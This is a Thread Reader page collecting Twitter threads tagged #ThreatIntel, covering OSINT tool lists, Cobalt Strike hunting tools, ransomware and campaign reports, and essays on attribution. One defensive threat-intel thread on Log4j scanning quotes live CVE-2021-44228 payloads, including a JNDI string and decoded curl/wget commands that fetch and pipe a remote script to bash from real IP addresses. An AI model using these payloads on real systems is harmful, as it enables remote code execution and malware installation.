Discover and read the best of Twitter Threads about #ThreatIntel

Most recents (24)

#OSINT: En esta oportunidad, realizaré un recordaris de todos mis tweets (Hilos) populares sobre Herramientas y métodos para investigaciones.🔎

Thread of Tools and methods for investigations.

#DataBreach #Socmint #ThreatIntel #GoogleCloudShell #ManuelBot #Leaks
🧵HILO🧵 Image
1⃣ Hilo de Heramientas y métodos para investigaciones🔎 por correos electrónicos. Thread of Tools and methods for investigations by emails.
📌

⬇️ Image
2⃣ 12 recursos gratuitos de OSINT (libros, manuales, presentaciones y documentos de investigación traducidos al Español) para pasar de cero a héroe.
📌 Image
Read 9 tweets
(1/6) To all investigators out there who have heard of #Maltego before, but still looking for more information. Here's what you need to know about Maltego 👇 #OSINT #infosec
(2/6) #Maltego is a link analysis tool that helps you automatically pull and map data from over 70 public data sources (#OSINT) and third-party data providers, and your own imported or custom data integrations. All of this done with a few clicks on the mouse in one interface.
(3/6) You start by providing input information for your investigation (name, alias, domain, IP address, etc.), install the data integrations you want to use, and #Maltego will retrieve relevant Entities from the data integrations and visualize the data connections between them.
Read 6 tweets
With the release of my open-source #CobaltStrike stager decoder (which you can read about here: stairwell.com/news/stairwell…) I thought I'd make a thread showcasing some of the other great open-source tooling out there to help with Cobalt Strike #ThreatHunting and #ThreatIntel 🧵
github.com/RomanEmelyanov…: These are the OG scripts designed for interfacing with Team Servers. Famous for its get_beacon script for milking staged payloads from Team Servers and decrypting them, this GH account also has a script for logging into teamservers and wordlists💀
github.com/JPCERTCC/aa-to… The first Cobalt Strike Beacon configuration extractor that I was aware of, @jpcert_en created a volatility plugin for finding and parsing Beacon configs from memory
Read 8 tweets
📢I recently investigated a campaign targeting the cryptocurrency industry. I wrote a detailed report that includes TTP, IOC and more. Here is a thread about this attack! 🧵👇

@MsftSecIntel @MicrosoftAU #infosec #cryptocurrency #threatintelligence #apt

microsoft.com/en-us/security…
The attack started on Telegram to identify the targets, then they deployed a weaponized Excel document which finally delivered the final backdoor through multiple mechanisms. ☠☠️ #infosec #malware #backdoor
🧐To identify the targets, the threat actor sought out members of cryptocurrency investment groups on Telegram.

👀They created fake profiles using details from employees of the company OKX. #infosec #Cryptocurency
Read 14 tweets
For those who do #ThreatIntel; could you please read this thread and share with me your thoughts?

1. Client signs up for a service
2. Client after a while sends email requesting their email to be deleted from our systems to limit online exposure
3. Client gets email deleted

1/3
After a month+
1. Clients signs up for service again using different email
2. After a while, client sends an email requesting account deletion claiming they're limiting their online exposure

Question after this scenario: what is the real benefit they gain from this? #OSINT

2/3
You might be asking how I noticed this? The answer is they used the exact same email! It was very clear to me that I've seen this before & a quick search revealed that my brain was still functioning! 😊

I would appreciate anyone educating me with ideas! #ThreatIntel #OSINT

3/3
Read 4 tweets
It is done! This should have been released a long time ago but I am glad I took the time to finish it.

For those of you who are into #osint or for #threatintel I am releasing my OSINT Notebook to share with you all.

github.com/tjnull/TJ-OSIN… Image
This notebook provides an overview of the tools, techniques, and resources that I use for a variety of situations for performing reconnaissance and OSINT operations. This Notebook has helped me in many situations to learn more about OSINT.
If you do not use Joplin I have provided raw markdown files that you can use to integrate into the note taking tool that you use.
Read 4 tweets
#OSINT: Hilo de Heramientas y métodos para investigaciones🔎 por correos electrónicos.

Thread of Tools and methods for investigations by emails.
#AnalistaOsint #Cybersecurity #DataBreach #ToolsOsint #EmailOsint #OSINT #leaks #ThreatIntel #GoogleCloudShell #ManuelBot
🧵HILO🧵
1⃣ - EPIEOS. 🕵️‍♀️Herramienta que extrae valiosa información partir de un correo electrónico ya sea Hotmail, Gmail📧 vinculando a otros servicios como Skype, Spotify, twitter, entre otros.

epieos.com
2⃣ - 🔎 IDENTIFICATOR SPACE. Herramienta que automatizar las búsquedas OSINT mediante la recopilación de datos en fuentes públicas a través de un sistema de módulos.
identificator.space/search
Read 13 tweets
🧵Thread: 10 underestimated resources about malware techniques.

This is a list of various resources to learn more about malware techniques, how to analyse them and how to improve your detection! 🤓 #infosec #malware #threatintel #malwareanalysis #cybersecurity
#1: The Unprotect Project

Of course, I couldn't start this thread without talking about this project we started in 2015. Unprotect Project is a database about Malware Evasion techniques with code snippets and detection rules. cf: @DarkCoderSc

🌐unprotect.it
#2: The LolBas project

Living off the land refers to the use of dual-use tools, which are either already installed in the victims' environment, or are admin, forensic or system tools used maliciously.

🌐lolbas-project.github.io
Read 13 tweets
Hey there, today we have something special for you.

Here's a list of SPY/INTELLIGENCE agencies across the world. 🕵️‍♀️🕵🌍🔎

#ThreatHunting #threatintelligence #ThreatIntel #military #OSINT

1. RAW (Research & Analysis Wing), India
Formed: 21 September 1968
2. CIA (Central Intelligence Agency), USA
Formed: September 18, 1947
#ThreatHunting #threatintelligence #ThreatIntel #military #OSINT
3. Mossad, Israel
Formed: 13 December 1949 (as the Central Institute for Coordination)
#ThreatHunting #threatintelligence #ThreatIntel #military #OSINT
Read 12 tweets
Save this list of resources for your future #OSINT Investigations!

intelx.io: Search engine for data breaches
netlas.io: Search & monitor devices connected to the internet
urlscan.io: Scan a website incoming and outgoing links and assets
prowl.lupovis.io: Free IP search & identifications of IoC and IoA
fullhunt.io: Identify an attack surface
zoomeye.org: Cyberspace search engine, users can search for network devices
leakix.net: Identify public data leaks
greynoise.io: Search for devices connected to the internet
search.censys.io: Get information about devices connected to the internet
hunter.io: Search for email addresses
Read 6 tweets
#ICYMI, here's a #threatintel related🧵👇 by me on @USTreasury advisory on DPRK IT workers' attempts to obtain employment while posing as non-North Korean nationals: home.treasury.gov/system/files/1… (1/?)
DPRK IT workers "engage in a wide range of IT dev work, such as: mobile & web-based apps, virtual currency exchange platforms & digital coins. Some
designed virtual currency exchanges or created analytic tools/apps for virtual currency traders & marketed their products." (2/?)
This reminds me, for example, of Marine Chain Token: (justice.gov/opa/pr/three-n…; justice.gov/opa/press-rele…), #AppleJeus (cisa.gov/uscert/ncas/al…) and, more recently, #TraderTraitor (cisa.gov/uscert/ncas/al…). #HIDDENCOBRA/#APT38 loves loves loves their crypto (3/?)
Read 14 tweets
Visualizing #cybersecurity concepts can be a great way to learn more about specific tools, methodologies, and techniques! Here is a thread that shows 6 useful infographics on threat intelligence and related topics!🧵👇#infosec #threatintel

1⃣ - Practical Threat Intel
2⃣ - Tactics, Techniques and Procedures is an important concept to understand when you are working on threat intelligence to understand the capabilities of threat actors! 🤓 #Infosec #ttp
3⃣ - Mitre ATT&CK Matrix is became one of the references to classify and categorize attackers' TTPs! ☠️ #cybersecurity
Read 8 tweets
Many #threatintel teams likely have a new requirement to provide daily (or more!) updates on the UA/RU war to include cyber threat activity AND factors like sanctions, military developments, etc. This is not easy. Here are my ✅ tips for surviving "intel update fatigue" 🧵.
✅ Reduce, filter sources

There is too much information--much of it unconfirmed--from disparate sources. Stick to news from reliable and official sources (national CERTs, your intel providers, AP, Reuters, BBC, etc.) who have done the vetting for you.
✅ Change your dissemination habits; prioritize speed

If your team typically disseminates information via traditional reports (presumably over email), consider creating a dedicated chat channel with your security and business partners exclusively for fast updates...
Read 9 tweets
My parents have been looking to buy an RV and this evening my Mom found an oddly cheap RV on an "RV Trader" website. I'm pretty sure it's a scam - come with me while I investigate and use some #OSINT along the way! #ThreatIntel #SCAM #infosec
The link my mom sent was for a 2005 Airstream Bambi, for 9,800 dollars - wait, that seems way too cheap! Image
First red flag, the website doesn't seem to give you any information....you need to click "request more info" which prompts for your contact information. Image
Read 12 tweets
Mass scanning activity detected from multiple hosts checking for servers using Apache Log4j (Java logging library) vulnerable to remote code execution (github.com/advisories/GHS…).

Query our API for "tags=CVE-2021-44228" for source IP addresses and other IOCs. #threatintel
Example CVE-2021-44228 payload:
${jndi:ldap://80.71.158.12:5557/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=}

Decoded:
(curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash

Source IP:
62.76.41.46 (🇷🇺) ImageImage
Example CVE-2021-44228 payload (decoded):
wget http://62.210.130.250/lh.sh;chmod +x lh[.]sh;./lh.sh
http://62.210.130.250/lh.sh

Type:
DDoS malware (virustotal.com/gui/file/2b794…)

Source IP:
45.137.21.9 (🇧🇩/🇳🇱) ImageImage
Read 41 tweets
Today I started compiling a list of the #twitter accounts of companies that develop useful #OSINT tools.

twitter.com/i/lists/143849…

In this thread🧵, I'll talk about the project behind each account on the this list.
@haveibeenpwned Check if your email or phone is in a data breach haveibeenpwned.com

@duckduckgo Privacy search engine duckduckgo.com

@webintmaster Companies research tool tradint.io/tradint-resear…
@Fear_the_Foca tool used to find metadata and hidden information in documents

@SpyseHQ internet access search engine spyse.com

@sploitus_com tools & exploits search engine sploitus.com
Read 28 tweets
In light of the recent #SupplyChain attack on @KaseyaCorp by #REvil, it is worth paying attention to decoder[.]re included within the ransom notes, used additionally to 'mirror' in TOR network. #Ransomware #Cybersecurity #ThreatIntel #ThreatHunting #Malware Image
Similar to decryptor[.]cc and decryptor[.]top in previous #REvil/#Sodinokibi versions, decoder[.]re is used to grant the victims access to the threat actors WEB-site for further negotiations should their connection be limited via #TOR. Image
To access the page in WWW or TOR - the victim needs to provide a valid UID (e.g. "9343467A488841AC") ImageImage
Read 11 tweets
ICYMI, @PwC_UK’s 2020 #threatintel Year in Retrospect report is out now! All team contributed but h/t to @KystleM_Reid! :fire: You can check it out here: pwc.to/2ZPx7fo In this thread, I will summarise some of what I thought were key findings: 🧵👇 1/n
#Ransomware has become the most significant cyber security threat faced by organisations, irrespective of industry/location. TTPs have pivoted to mass data exfiltration prior to encryption, along with leaks & extortion. S/o to @andyp346 for all your work countering this.🙏 2/n
In 2020, 86% of the incidents that PwC’s Incident Response team responded to were attributable to cyber criminals. 79% of leaks happened in 2nd half of 2020. Our data sees Manufacturing, TMT, & Professional Services most impacted. 3/n
Read 19 tweets
I'm generally a pretty positive person, but it's Festivus, so let's blow off some steam and air our #threatintel grievances. Threat intel feeds are just data feeds, they're not threat intel. Please stop naming groups after malware, it's confusing AF.
Nation states are not countries. CC @cnoanalysis en.wikipedia.org/wiki/Nation_st…
If you use fear, uncertainty, and doubt to sell things, you are a GRINCH and please stop.
Read 19 tweets
A thread on bad analysis. When #ThreatIntel analysts want to show off their Foreign Policy and Economist subscription status after reading the Russian foreign policy Wikipedia page /n #threatintelligence #cybersecurity #infosec Image
Most analysts who are "doing attribution" aren't doing good cyber threat intelligence, they're doing poor foreign policy analysis
They neither have neither the data nor the expertise to make even a moderately confident statement on attribution
Read 12 tweets
My paper on “Public Attribution of Cyber Intrusions” was published in the Journal of Cybersecurity (@OUPAcademic). It's open access so everyone can have a read. I summarize the main insights in the thread below:
academic.oup.com/cybersecurity/…
Drawing on the intelligence studies literature, I argue that public attribution is employed to shape the “rules of the game” and thereby shape the normative and operational environment for cyber operations.
I split attribution into sense-making and meaning-making processes: sense-making process refers to the knowledge-generation process that establishes what happened, the meaning-making process to deliberate actions that influence how others interpret a particular cyber intrusion
Read 13 tweets
Sunday's fun fact on inferences:
Arthur Conan Doyle's fictional character "Sherlock Holmes" is based on his real-life professor under whom he studied medicine,Dr. Joseph Bell.

"It is most certainly to you that I owe Sherlock Holmes and though in the stories I have the advantage
...of being able to place Sherlock in all sorts of dramatic positions, I do not think his analytical work is in the least exaggeration of some effects which I have seen you produce in the outpatient ward"
wrote Conan Doyle in a letter to Dr. Bell.
Apparently, other than his medical education, Dr. Bell was also very knowledgeable in other areas such as geography and the cultures, the dialects, patterns of speech and behavior, the army, and more. He was also very observant.
Read 11 tweets
False flag operations are very rare because they're risky and the blowback effects are bad. Interestingly, the risks increase the more "important" you are so the most powerful countries are less likely to conduct FF ops. /1 #infosec #cybersecurity #ThreatIntel
Traditional covert and clandestine operations are cheaper, less risky, and more likely to succeed than false flag ops. Importantly, not all attempts to redirect blame is a false flag but just considered standard covert ops. /2
False flags are also generally misunderstood and confused. For example, using Russian as an English speaker in malware is, by itself, not a false flag but rather just considered good covert practice. It doesn't attempt to place blame but just conceal the operators better. /3
Read 5 tweets

Related hashtags

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!